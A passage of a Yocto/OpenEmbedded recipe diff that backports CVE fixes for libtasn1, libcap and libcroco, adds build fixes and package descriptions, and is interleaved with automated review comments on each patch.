+ 2 files changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/NEWS b/NEWS
+index f042481..d8f684e 100644
+--- a/NEWS
++++ b/NEWS
+@@ -1,5 +1,9 @@
+ GNU Libtasn1 NEWS -*- outline -*-
+
++* Noteworthy changes in release ?.? (????-??-??) [?]
++- Fix ETYPE_OK out of bounds read. Closes: #32.
++- Update gnulib files and various maintenance fixes.
++
+ * Noteworthy changes in release 4.16.0 (released 2020-02-01) [stable]
+ - asn1_decode_simple_ber: added support for constructed definite
+ octet strings. This allows this function decode the whole set of
+diff --git a/lib/int.h b/lib/int.h
+index ea16257..c877282 100644
+--- a/lib/int.h
++++ b/lib/int.h
+@@ -97,7 +97,7 @@ typedef struct tag_and_class_st
+ #define ETYPE_TAG(etype) (_asn1_tags[etype].tag)
+ #define ETYPE_CLASS(etype) (_asn1_tags[etype].class)
+ #define ETYPE_OK(etype) (((etype) != ASN1_ETYPE_INVALID && \
+- (etype) <= _asn1_tags_size && \
++ (etype) < _asn1_tags_size && \
+ _asn1_tags[(etype)].desc != NULL)?1:0)
+
+ #define ETYPE_IS_STRING(etype) ((etype == ASN1_ETYPE_GENERALSTRING || \
+--
+2.25.1
+
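Review bot: The `NEWS` hunk is not part of the fix and should be dropped from this backport: it inserts a placeholder `release ?.? (????-??-??)` entry into the 4.16.0 tree and is the part most likely to conflict with a later libtasn1 backport. The functional change is the single `lib/int.h` line, where `(etype) < _asn1_tags_size` keeps `ETYPE_OK` from accepting an index equal to the table size (assuming `_asn1_tags_size` is the element count of `_asn1_tags[]`, which the hunk does not show). Keeping only that hunk, under the existing `Upstream-Status` and `CVE:` tags, gives the same fix in a smaller patch.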
diff --git a/meta/recipes-support/gnutls/libtasn1_4.16.0.bb b/meta/recipes-support/gnutls/libtasn1_4.16.0.bb
index 8337b70241..d2b3c492ec 100644
--- a/meta/recipes-support/gnutls/libtasn1_4.16.0.bb
+++ b/meta/recipes-support/gnutls/libtasn1_4.16.0.bb
@@ -1,4 +1,6 @@
SUMMARY = "Library for ASN.1 and DER manipulation"
+DESCRIPTION = "A highly portable C library that encodes and decodes \
+DER/BER data following an ASN.1 schema. "
HOMEPAGE = "http://www.gnu.org/software/libtasn1/"
LICENSE = "GPLv3+ & LGPLv2.1+"
@@ -10,6 +12,7 @@ LIC_FILES_CHKSUM = "file://doc/COPYING;md5=d32239bcb673463ab874e80d47fae504 \
SRC_URI = "${GNU_MIRROR}/libtasn1/libtasn1-${PV}.tar.gz \
file://dont-depend-on-help2man.patch \
+ file://CVE-2021-46848.patch \
"
DEPENDS = "bison-native"
diff --git a/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch b/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch
new file mode 100644
index 0000000000..1c46684c6d
--- /dev/null
+++ b/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch
@@ -0,0 +1,24 @@
+From adb1d4e5498a19e9d591ac8f42f9ddfdb23a1354 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Thu, 15 Jul 2021 12:33:13 -0700
+Subject: [PATCH] use closefrom() on linux and glibc 2.34+
+
+Upstream-Status: Pending
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ src/posix-io.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/posix-io.c b/src/posix-io.c
+index e712ef2..ab8ded9 100644
+--- a/src/posix-io.c
++++ b/src/posix-io.c
+@@ -570,7 +570,7 @@ _gpgme_io_spawn (const char *path, char *const argv[], unsigned int flags,
+ if (fd_list[i].fd > fd)
+ fd = fd_list[i].fd;
+ fd++;
+-#if defined(__sun) || defined(__FreeBSD__)
++#if defined(__sun) || defined(__FreeBSD__) || (defined(__GLIBC__) && __GNUC_PREREQ(2, 34))
+ closefrom (fd);
+ max_fds = fd;
+ #else /*!__sun */
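Review bot: `__GNUC_PREREQ(2, 34)` on the changed `#if` tests the GCC compiler version, not the glibc version, so once `__GLIBC__` is defined the condition holds for practically every GCC and `closefrom()` is selected even when the C library is older than 2.34. The glibc version test is `__GLIBC_PREREQ`, so the line should read `#if defined(__sun) || defined(__FreeBSD__) || (defined(__GLIBC__) && __GLIBC_PREREQ(2, 34))`. This branch is the one that closes descriptors above `fd` in `_gpgme_io_spawn`, so a wrong selection should show up as a build failure on older glibc rather than as leaked descriptors, but that is worth confirming for every libc this recipe is built against. The function starts and ends outside the hunk.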
diff --git a/meta/recipes-support/gpgme/gpgme_1.13.1.bb b/meta/recipes-support/gpgme/gpgme_1.13.1.bb
index b51534351d..dacc9896e4 100644
--- a/meta/recipes-support/gpgme/gpgme_1.13.1.bb
+++ b/meta/recipes-support/gpgme/gpgme_1.13.1.bb
@@ -20,7 +20,8 @@ SRC_URI = "${GNUPG_MIRROR}/gpgme/${BP}.tar.bz2 \
file://0006-fix-build-path-issue.patch \
file://0007-python-Add-variables-to-tests.patch \
file://0008-do-not-auto-check-var-PYTHON.patch \
- "
+ file://0001-use-closefrom-on-linux-and-glibc-2.34.patch \
+ "
SRC_URI[md5sum] = "198f0a908ec3cd8f0ce9a4f3a4489645"
SRC_URI[sha256sum] = "c4e30b227682374c23cddc7fdb9324a99694d907e79242a25a4deeedb393be46"
@@ -49,7 +50,7 @@ DEFAULT_LANGUAGES_class-target = "cpp"
LANGUAGES ?= "${DEFAULT_LANGUAGES} python"
PYTHON_INHERIT = "${@bb.utils.contains('PACKAGECONFIG', 'python2', 'pythonnative', '', d)}"
-PYTHON_INHERIT .= "${@bb.utils.contains('PACKAGECONFIG', 'python3', 'python3native', '', d)}"
+PYTHON_INHERIT .= "${@bb.utils.contains('PACKAGECONFIG', 'python3', 'python3native python3targetconfig', '', d)}"
EXTRA_OECONF += '--enable-languages="${LANGUAGES}" \
--disable-gpgconf-test \
diff --git a/meta/recipes-support/icu/icu/0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch b/meta/recipes-support/icu/icu/0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch
new file mode 100644
index 0000000000..d7ddf33bce
--- /dev/null
+++ b/meta/recipes-support/icu/icu/0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch
@@ -0,0 +1,24 @@
+From f2bc064e0d70ac068de4539d069bfab6cdccc48d Mon Sep 17 00:00:00 2001
+From: "Shane F. Carr" <shane@unicode.org>
+Date: Fri, 10 Jul 2020 14:28:22 -0500
+Subject: [PATCH] ICU-21175 Add cnvalias as a dependency of misc_res
+
+Upstream-Status: Backport [https://github.com/unicode-org/icu/commit/ee2d8b01034c3101de2bd58f9328daa076995e9e]
+Signed-off-by: Martin Jansa <Martin.Jansa@gmail.com>
+---
+ data/BUILDRULES.py | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/data/BUILDRULES.py b/data/BUILDRULES.py
+index 2338afd1f7..63b6e09273 100644
+--- a/data/BUILDRULES.py
++++ b/data/BUILDRULES.py
+@@ -361,7 +361,7 @@ def generate_misc(config, io, common_vars):
+ RepeatedExecutionRequest(
+ name = "misc_res",
+ category = "misc",
+- dep_targets = [],
++ dep_targets = [DepTarget("cnvalias")], # ICU-21175
+ input_files = input_files,
+ output_files = output_files,
+ tool = IcuTool("genrb"),
diff --git a/meta/recipes-support/icu/icu_66.1.bb b/meta/recipes-support/icu/icu_66.1.bb
index 08254648e4..6ba88595df 100644
--- a/meta/recipes-support/icu/icu_66.1.bb
+++ b/meta/recipes-support/icu/icu_66.1.bb
@@ -21,10 +21,11 @@ BASE_SRC_URI = "https://github.com/unicode-org/icu/releases/download/release-${I
DATA_SRC_URI = "https://github.com/unicode-org/icu/releases/download/release-${ICU_FOLDER}/icu4c-${ICU_PV}-data.zip"
SRC_URI = "${BASE_SRC_URI};name=code \
${DATA_SRC_URI};name=data \
+ file://0001-Fix-big-endian-build.patch;patchdir=${WORKDIR} \
+ file://0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch;patchdir=${WORKDIR} \
file://filter.json \
file://icu-pkgdata-large-cmd.patch \
file://fix-install-manx.patch \
- file://0001-Fix-big-endian-build.patch;apply=no \
file://0001-icu-Added-armeb-support.patch \
file://CVE-2020-10531.patch \
"
@@ -47,7 +48,6 @@ do_make_icudata_class-target () {
cd ${S}
rm -rf data
cp -a ${WORKDIR}/data .
- patch -p1 < ${WORKDIR}/0001-Fix-big-endian-build.patch
${@bb.utils.contains('PACKAGECONFIG', 'make-icudata', '', 'exit 0', d)}
AR='${BUILD_AR}' \
CC='${BUILD_CC}' \
diff --git a/meta/recipes-support/iso-codes/iso-codes_4.4.bb b/meta/recipes-support/iso-codes/iso-codes_4.4.bb
index 4767dea84c..e8210eca9b 100644
--- a/meta/recipes-support/iso-codes/iso-codes_4.4.bb
+++ b/meta/recipes-support/iso-codes/iso-codes_4.4.bb
@@ -1,11 +1,14 @@
SUMMARY = "ISO language, territory, currency, script codes and their translations"
+DESCRIPTION = "Provides lists of various ISO standards (e.g. country, \
+language, language scripts, and currency names) in one place, rather \
+than repeated in many programs throughout the system."
HOMEPAGE = "https://salsa.debian.org/iso-codes-team/iso-codes"
BUGTRACKER = "https://salsa.debian.org/iso-codes-team/iso-codes/issues"
LICENSE = "LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
-SRC_URI = "git://salsa.debian.org/iso-codes-team/iso-codes.git;protocol=http;branch=main;"
+SRC_URI = "git://salsa.debian.org/iso-codes-team/iso-codes.git;protocol=https;branch=main;"
SRCREV = "38edb926592954b87eb527124da0ec68d2a748f3"
# inherit gettext cannot be used, because it adds gettext-native to BASEDEPENDS which
diff --git a/meta/recipes-support/itstool/itstool_2.0.6.bb b/meta/recipes-support/itstool/itstool_2.0.6.bb
index 5f358f463d..54105af5f0 100644
--- a/meta/recipes-support/itstool/itstool_2.0.6.bb
+++ b/meta/recipes-support/itstool/itstool_2.0.6.bb
@@ -1,4 +1,8 @@
SUMMARY = "ITS Tool allows you to translate your XML documents with PO files"
+DESCRIPTION = "It extracts messages from XML files and outputs PO template \
+files, then merges translations from MO files to create translated \
+XML files. It determines what to translate and how to chunk it into \
+messages using the W3C Internationalization Tag Set (ITS). "
HOMEPAGE = "http://itstool.org/"
LICENSE = "GPLv3"
LIC_FILES_CHKSUM = "file://COPYING;md5=59c57b95fd7d0e9e238ebbc7ad47c5a5"
diff --git a/meta/recipes-support/libassuan/libassuan_2.5.3.bb b/meta/recipes-support/libassuan/libassuan_2.5.3.bb
index 52b4c0f1b9..9ef5074120 100644
--- a/meta/recipes-support/libassuan/libassuan_2.5.3.bb
+++ b/meta/recipes-support/libassuan/libassuan_2.5.3.bb
@@ -1,4 +1,7 @@
SUMMARY = "IPC library used by GnuPG and GPGME"
+DESCRIPTION = "A small library implementing the so-called Assuan protocol. \
+This protocol is used for IPC between most newer GnuPG components. \
+Both, server and client side functions are provided. "
HOMEPAGE = "http://www.gnupg.org/related_software/libassuan/"
BUGTRACKER = "https://bugs.g10code.com/gnupg/index"
diff --git a/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb b/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb
index 7628eedb1b..3089d1f7ff 100644
--- a/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb
+++ b/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb
@@ -1,4 +1,5 @@
SUMMARY = "A library for atomic integer operations"
+DESCRIPTION = "Package provides semi-portable access to hardware-provided atomic memory update operations on a number of architectures."
HOMEPAGE = "https://github.com/ivmai/libatomic_ops/"
SECTION = "optional"
PROVIDES += "libatomics-ops"
diff --git a/meta/recipes-support/libbsd/libbsd_0.10.0.bb b/meta/recipes-support/libbsd/libbsd_0.10.0.bb
index 5b32b9af41..58925738cb 100644
--- a/meta/recipes-support/libbsd/libbsd_0.10.0.bb
+++ b/meta/recipes-support/libbsd/libbsd_0.10.0.bb
@@ -29,6 +29,12 @@ HOMEPAGE = "https://libbsd.freedesktop.org/wiki/"
# License: public-domain-Colin-Plumb
LICENSE = "BSD-3-Clause & BSD-4-Clause & ISC & PD"
LICENSE_${PN} = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-dbg = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-dev = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-doc = "BSD-3-Clause & BSD-4-Clause & ISC & PD"
+LICENSE:${PN}-locale = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-src = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-staticdev = "BSD-3-Clause & ISC & PD"
LIC_FILES_CHKSUM = "file://COPYING;md5=2120be0173469a06ed185b688e0e1ae0"
SECTION = "libs"
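Review bot: The six added per-package assignments use the colon override form `LICENSE:${PN}-dbg`, while the existing line directly above them is `LICENSE_${PN}`; the recipe should use one form throughout. If the BitBake on this branch does not accept `:` as the override separator, the new lines would not set the package licences at all, and the licence manifest for these packages would silently fall back to the recipe-level `LICENSE`. The underscore form the recipe already uses is the safer spelling here, e.g. `LICENSE_${PN}-dbg = "BSD-3-Clause & ISC & PD"`, and likewise for `-dev`, `-doc`, `-locale`, `-src` and `-staticdev`.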
diff --git a/meta/recipes-support/libcap/files/CVE-2023-2602.patch b/meta/recipes-support/libcap/files/CVE-2023-2602.patch
new file mode 100644
index 0000000000..ca04d7297a
--- /dev/null
+++ b/meta/recipes-support/libcap/files/CVE-2023-2602.patch
@@ -0,0 +1,52 @@
+Backport of:
+
+From bc6b36682f188020ee4770fae1d41bde5b2c97bb Mon Sep 17 00:00:00 2001
+From: "Andrew G. Morgan" <morgan@kernel.org>
+Date: Wed, 3 May 2023 19:18:36 -0700
+Subject: Correct the check of pthread_create()'s return value.
+
+This function returns a positive number (errno) on error, so the code
+wasn't previously freeing some memory in this situation.
+
+Discussion:
+
+ https://stackoverflow.com/a/3581020/14760867
+
+Credit for finding this bug in libpsx goes to David Gstir of
+X41 D-Sec GmbH (https://x41-dsec.de/) who performed a security
+audit of the libcap source code in April of 2023. The audit
+was sponsored by the Open Source Technology Improvement Fund
+(https://ostif.org/).
+
+Audit ref: LCAP-CR-23-01 (CVE-2023-2602)
+
+Signed-off-by: Andrew G. Morgan <morgan@kernel.org>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libcap2/tree/debian/patches/CVE-2023-2602.patch?h=ubuntu/focal-security
+Upstream commit https://git.kernel.org/pub/scm/libs/libcap/libcap.git/commit/?id=bc6b36682f188020ee4770fae1d41bde5b2c97bb]
+CVE: CVE-2023-2602
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ psx/psx.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/libcap/psx.c
++++ b/libcap/psx.c
+@@ -272,7 +272,7 @@ int psx_pthread_create(pthread_t *thread
+
+ psx_wait_for_idle();
+ int ret = pthread_create(thread, attr, start_routine, arg);
+- if (ret != -1) {
++ if (ret == 0) {
+ psx_do_registration(*thread);
+ }
+ psx_resume_idle();
+@@ -287,7 +287,7 @@ int __wrap_pthread_create(pthread_t *thr
+ void *(*start_routine) (void *), void *arg) {
+ psx_wait_for_idle();
+ int ret = __real_pthread_create(thread, attr, start_routine, arg);
+- if (ret != -1) {
++ if (ret == 0) {
+ psx_do_registration(*thread);
+ }
+ psx_resume_idle();
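Review bot: The patch header does not record how this backport differs from the upstream commit: its diffstat names `psx/psx.c` while both hunks patch `libcap/psx.c`, and in `CVE-2023-2603.patch` the diffstat reads 7 insertions and 5 deletions while its single hunk adds ten lines and removes one. Both look like hand-adapted backports to 2.32, which is fine, but someone auditing the CVE fix cannot tell from the header what was moved or left out. A line such as `Comment: adapted for 2.32, file path and hunk differ from upstream` under `Upstream-Status` in each of the two patches would document it. The `ret == 0` test itself matches the convention the commit message describes (a positive errno on failure); both patched functions start and end outside their hunks.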
diff --git a/meta/recipes-support/libcap/files/CVE-2023-2603.patch b/meta/recipes-support/libcap/files/CVE-2023-2603.patch
new file mode 100644
index 0000000000..cf86ac2a46
--- /dev/null
+++ b/meta/recipes-support/libcap/files/CVE-2023-2603.patch
@@ -0,0 +1,58 @@
+Backport of:
+
+From 422bec25ae4a1ab03fd4d6f728695ed279173b18 Mon Sep 17 00:00:00 2001
+From: "Andrew G. Morgan" <morgan@kernel.org>
+Date: Wed, 3 May 2023 19:44:22 -0700
+Subject: Large strings can confuse libcap's internal strdup code.
+
+Avoid something subtle with really long strings: 1073741823 should
+be enough for anybody. This is an improved fix over something attempted
+in libcap-2.55 to address some static analysis findings.
+
+Reviewing the library, cap_proc_root() and cap_launcher_set_chroot()
+are the only two calls where the library is potentially exposed to a
+user controlled string input.
+
+Credit for finding this bug in libcap goes to Richard Weinberger of
+X41 D-Sec GmbH (https://x41-dsec.de/) who performed a security audit
+of the libcap source code in April of 2023. The audit was sponsored
+by the Open Source Technology Improvement Fund (https://ostif.org/).
+
+Audit ref: LCAP-CR-23-02 (CVE-2023-2603)
+
+Signed-off-by: Andrew G. Morgan <morgan@kernel.org>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libcap2/tree/debian/patches/CVE-2023-2603.patch?h=ubuntu/focal-security
+Upstream commit https://git.kernel.org/pub/scm/libs/libcap/libcap.git/commit/?id=422bec25ae4a1ab03fd4d6f728695ed279173b18]
+CVE: CVE-2023-2603
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libcap/cap_alloc.c | 12 +++++++-----
+ 1 file changed, 7 insertions(+), 5 deletions(-)
+
+--- a/libcap/cap_alloc.c
++++ b/libcap/cap_alloc.c
+@@ -76,13 +76,22 @@ cap_t cap_init(void)
+ char *_libcap_strdup(const char *old)
+ {
+ __u32 *raw_data;
++ size_t len;
+
+ if (old == NULL) {
+ errno = EINVAL;
+ return NULL;
+ }
+
+- raw_data = malloc( sizeof(__u32) + strlen(old) + 1 );
++ len = strlen(old);
++ if ((len & 0x3fffffff) != len) {
++ _cap_debug("len is too long for libcap to manage");
++ errno = EINVAL;
++ return NULL;
++ }
++ len += sizeof(__u32) + 1;
++
++ raw_data = malloc(len);
+ if (raw_data == NULL) {
+ errno = ENOMEM;
+ return NULL;
diff --git a/meta/recipes-support/libcap/libcap_2.32.bb b/meta/recipes-support/libcap/libcap_2.32.bb
index d78a58f7d2..64d5190aa7 100644
--- a/meta/recipes-support/libcap/libcap_2.32.bb
+++ b/meta/recipes-support/libcap/libcap_2.32.bb
@@ -1,8 +1,10 @@
SUMMARY = "Library for getting/setting POSIX.1e capabilities"
+DESCRIPTION = "A library providing the API to access POSIX capabilities. \
+These allow giving various kinds of specific privileges to individual \
+users, without giving them full root permissions."
HOMEPAGE = "http://sites.google.com/site/fullycapable/"
-
# no specific GPL version required
-LICENSE = "BSD | GPLv2"
+LICENSE = "BSD-3-Clause | GPLv2"
LIC_FILES_CHKSUM = "file://License;md5=3f84fd6f29d453a56514cb7e4ead25f1"
DEPENDS = "hostperl-runtime-native gperf-native"
@@ -11,6 +13,8 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/libs/security/linux-privs/${BPN}2/${BPN}-${
file://0001-ensure-the-XATTR_NAME_CAPS-is-defined-when-it-is-use.patch \
file://0002-tests-do-not-run-target-executables.patch \
file://0001-tests-do-not-statically-link-a-test.patch \
+ file://CVE-2023-2602.patch \
+ file://CVE-2023-2603.patch \
"
SRC_URI[md5sum] = "7416119c9fdcfd0e8dd190a432c668e9"
SRC_URI[sha256sum] = "1005e3d227f2340ad1e3360ef8b69d15e3c72a29c09f4894d7aac038bd26e2be"
diff --git a/meta/recipes-support/libcheck/libcheck_0.14.0.bb b/meta/recipes-support/libcheck/libcheck_0.14.0.bb
index a88f009cdb..57963d83d4 100644
--- a/meta/recipes-support/libcheck/libcheck_0.14.0.bb
+++ b/meta/recipes-support/libcheck/libcheck_0.14.0.bb
@@ -1,4 +1,9 @@
SUMMARY = "Check - unit testing framework for C code"
+DESCRIPTION = "It features a simple interface for defining unit tests, \
+putting little in the way of the developer. Tests are run in a separate \
+address space, so both assertion failures and code errors that cause \
+segmentation faults or other signals can be caught. Test results are \
+reportable in the following: Subunit, TAP, XML, and a generic logging format."
HOMEPAGE = "https://libcheck.github.io/check/"
SECTION = "devel"
diff --git a/meta/recipes-support/libcroco/files/CVE-2020-12825.patch b/meta/recipes-support/libcroco/files/CVE-2020-12825.patch
new file mode 100644
index 0000000000..42f92e3607
--- /dev/null
+++ b/meta/recipes-support/libcroco/files/CVE-2020-12825.patch
@@ -0,0 +1,192 @@
+From fdf78a4877afa987ba646a8779b513f258e6d04c Mon Sep 17 00:00:00 2001
+From: Michael Catanzaro <mcatanzaro@gnome.org>
+Date: Fri, 31 Jul 2020 15:21:53 -0500
+Subject: [PATCH] libcroco: Limit recursion in block and any productions
+
+ (CVE-2020-12825)
+
+If we don't have any limits, we can recurse forever and overflow the
+stack.
+
+Fixes #8
+This is per https://gitlab.gnome.org/Archive/libcroco/-/issues/8
+
+https://gitlab.gnome.org/GNOME/gnome-shell/-/merge_requests/1404
+
+CVE: CVE-2020-12825
+Upstream-Status: Backport [https://gitlab.gnome.org/Archive/libcroco/-/commit/6eb257e5c731c691eb137fca94e916ca73941a5a]
+Comment: No refreshing changes done.
+Signed-off-by: Saloni Jain <Saloni.Jain@kpit.com>
+
+---
+ src/cr-parser.c | 44 +++++++++++++++++++++++++++++---------------
+ 1 file changed, 29 insertions(+), 15 deletions(-)
+
+diff --git a/src/cr-parser.c b/src/cr-parser.c
+index 18c9a01..f4a62e3 100644
+--- a/src/cr-parser.c
++++ b/src/cr-parser.c
+@@ -136,6 +136,8 @@ struct _CRParserPriv {
+
+ #define CHARS_TAB_SIZE 12
+
++#define RECURSIVE_CALLERS_LIMIT 100
++
+ /**
+ * IS_NUM:
+ *@a_char: the char to test.
+@@ -344,9 +346,11 @@ static enum CRStatus cr_parser_parse_selector_core (CRParser * a_this);
+
+ static enum CRStatus cr_parser_parse_declaration_core (CRParser * a_this);
+
+-static enum CRStatus cr_parser_parse_any_core (CRParser * a_this);
++static enum CRStatus cr_parser_parse_any_core (CRParser * a_this,
++ guint n_calls);
+
+-static enum CRStatus cr_parser_parse_block_core (CRParser * a_this);
++static enum CRStatus cr_parser_parse_block_core (CRParser * a_this,
++ guint n_calls);
+
+ static enum CRStatus cr_parser_parse_value_core (CRParser * a_this);
+
+@@ -784,7 +788,7 @@ cr_parser_parse_atrule_core (CRParser * a_this)
+ cr_parser_try_to_skip_spaces_and_comments (a_this);
+
+ do {
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, 0);
+ } while (status == CR_OK);
+
+ status = cr_tknzr_get_next_token (PRIVATE (a_this)->tknzr,
+@@ -795,7 +799,7 @@ cr_parser_parse_atrule_core (CRParser * a_this)
+ cr_tknzr_unget_token (PRIVATE (a_this)->tknzr,
+ token);
+ token = NULL;
+- status = cr_parser_parse_block_core (a_this);
++ status = cr_parser_parse_block_core (a_this, 0);
+ CHECK_PARSING_STATUS (status,
+ FALSE);
+ goto done;
+@@ -930,11 +934,11 @@ cr_parser_parse_selector_core (CRParser * a_this)
+
+ RECORD_INITIAL_POS (a_this, &init_pos);
+
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, 0);
+ CHECK_PARSING_STATUS (status, FALSE);
+
+ do {
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, 0);
+
+ } while (status == CR_OK);
+
+@@ -956,10 +960,12 @@ cr_parser_parse_selector_core (CRParser * a_this)
+ *in chapter 4.1 of the css2 spec.
+ *block ::= '{' S* [ any | block | ATKEYWORD S* | ';' ]* '}' S*;
+ *@param a_this the current instance of #CRParser.
++ *@param n_calls used to limit recursion depth
+ *FIXME: code this function.
+ */
+ static enum CRStatus
+-cr_parser_parse_block_core (CRParser * a_this)
++cr_parser_parse_block_core (CRParser * a_this,
++ guint n_calls)
+ {
+ CRToken *token = NULL;
+ CRInputPos init_pos;
+@@ -967,6 +973,9 @@ cr_parser_parse_block_core (CRParser * a_this)
+
+ g_return_val_if_fail (a_this && PRIVATE (a_this), CR_BAD_PARAM_ERROR);
+
++ if (n_calls > RECURSIVE_CALLERS_LIMIT)
++ return CR_ERROR;
++
+ RECORD_INITIAL_POS (a_this, &init_pos);
+
+ status = cr_tknzr_get_next_token (PRIVATE (a_this)->tknzr, &token);
+@@ -996,13 +1005,13 @@ cr_parser_parse_block_core (CRParser * a_this)
+ } else if (token->type == CBO_TK) {
+ cr_tknzr_unget_token (PRIVATE (a_this)->tknzr, token);
+ token = NULL;
+- status = cr_parser_parse_block_core (a_this);
++ status = cr_parser_parse_block_core (a_this, n_calls + 1);
+ CHECK_PARSING_STATUS (status, FALSE);
+ goto parse_block_content;
+ } else {
+ cr_tknzr_unget_token (PRIVATE (a_this)->tknzr, token);
+ token = NULL;
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, n_calls + 1);
+ CHECK_PARSING_STATUS (status, FALSE);
+ goto parse_block_content;
+ }
+@@ -1109,7 +1118,7 @@ cr_parser_parse_value_core (CRParser * a_this)
+ status = cr_tknzr_unget_token (PRIVATE (a_this)->tknzr,
+ token);
+ token = NULL;
+- status = cr_parser_parse_block_core (a_this);
++ status = cr_parser_parse_block_core (a_this, 0);
+ CHECK_PARSING_STATUS (status, FALSE);
+ ref++;
+ goto continue_parsing;
+@@ -1123,7 +1132,7 @@ cr_parser_parse_value_core (CRParser * a_this)
+ status = cr_tknzr_unget_token (PRIVATE (a_this)->tknzr,
+ token);
+ token = NULL;
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, 0);
+ if (status == CR_OK) {
+ ref++;
+ goto continue_parsing;
+@@ -1162,10 +1171,12 @@ cr_parser_parse_value_core (CRParser * a_this)
+ * | FUNCTION | DASHMATCH | '(' any* ')' | '[' any* ']' ] S*;
+ *
+ *@param a_this the current instance of #CRParser.
++ *@param n_calls used to limit recursion depth
+ *@return CR_OK upon successfull completion, an error code otherwise.
+ */
+ static enum CRStatus
+-cr_parser_parse_any_core (CRParser * a_this)
++cr_parser_parse_any_core (CRParser * a_this,
++ guint n_calls)
+ {
+ CRToken *token1 = NULL,
+ *token2 = NULL;
+@@ -1174,6 +1185,9 @@ cr_parser_parse_any_core (CRParser * a_this)
+
+ g_return_val_if_fail (a_this, CR_BAD_PARAM_ERROR);
+
++ if (n_calls > RECURSIVE_CALLERS_LIMIT)
++ return CR_ERROR;
++
+ RECORD_INITIAL_POS (a_this, &init_pos);
+
+ status = cr_tknzr_get_next_token (PRIVATE (a_this)->tknzr, &token1);
+@@ -1212,7 +1226,7 @@ cr_parser_parse_any_core (CRParser * a_this)
+ *We consider parameter as being an "any*" production.
+ */
+ do {
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, n_calls + 1);
+ } while (status == CR_OK);
+
+ ENSURE_PARSING_COND (status == CR_PARSING_ERROR);
+@@ -1237,7 +1251,7 @@ cr_parser_parse_any_core (CRParser * a_this)
+ }
+
+ do {
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, n_calls + 1);
+ } while (status == CR_OK);
+
+ ENSURE_PARSING_COND (status == CR_PARSING_ERROR);
+@@ -1265,7 +1279,7 @@ cr_parser_parse_any_core (CRParser * a_this)
+ }
+
+ do {
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, n_calls + 1);
+ } while (status == CR_OK);
+
+ ENSURE_PARSING_COND (status == CR_PARSING_ERROR);
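Review bot: The depth counter restarts at 0 on every call made from `cr_parser_parse_atrule_core`, `cr_parser_parse_selector_core` and `cr_parser_parse_value_core`, so `RECURSIVE_CALLERS_LIMIT` bounds stack use only if none of those three can be re-entered from inside `cr_parser_parse_block_core` or `cr_parser_parse_any_core`. The hunks do not show those call paths, so this should be confirmed and recorded next to the `0` arguments, for example `/* depth restarts here: not reachable from block/any recursion */`. A smaller point: `n_calls > RECURSIVE_CALLERS_LIMIT` admits 101 nested levels rather than 100, and `>=` would match the constant's name. All touched functions start or end outside the inner hunks.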
diff --git a/meta/recipes-support/libcroco/libcroco_0.6.13.bb b/meta/recipes-support/libcroco/libcroco_0.6.13.bb
index 9171a9de5c..66ee647ffa 100644
--- a/meta/recipes-support/libcroco/libcroco_0.6.13.bb
+++ b/meta/recipes-support/libcroco/libcroco_0.6.13.bb
@@ -1,4 +1,7 @@
SUMMARY = "Cascading Style Sheet (CSS) parsing and manipulation toolkit"
+DESCRIPTION = "The Libcroco project is an effort to build a generic \
+Cascading Style Sheet (CSS) parsing and manipulation toolkit that can be \
+used by GNOME applications in need of CSS support."
HOMEPAGE = "http://www.gnome.org/"
BUGTRACKER = "https://bugzilla.gnome.org/"
@@ -18,3 +21,6 @@ inherit gnomebase gtk-doc binconfig-disabled
SRC_URI[archive.md5sum] = "c80c5a8385011a0260dce6bd0da93dce"
SRC_URI[archive.sha256sum] = "767ec234ae7aa684695b3a735548224888132e063f92db585759b422570621d4"
+
+SRC_URI +="file://CVE-2020-12825.patch \
+"
diff --git a/meta/recipes-support/libdaemon/libdaemon_0.14.bb b/meta/recipes-support/libdaemon/libdaemon_0.14.bb
index 070ee1890e..85a30bcac3 100644
--- a/meta/recipes-support/libdaemon/libdaemon_0.14.bb
+++ b/meta/recipes-support/libdaemon/libdaemon_0.14.bb
@@ -1,4 +1,8 @@
SUMMARY = "Lightweight C library which eases the writing of UNIX daemons"
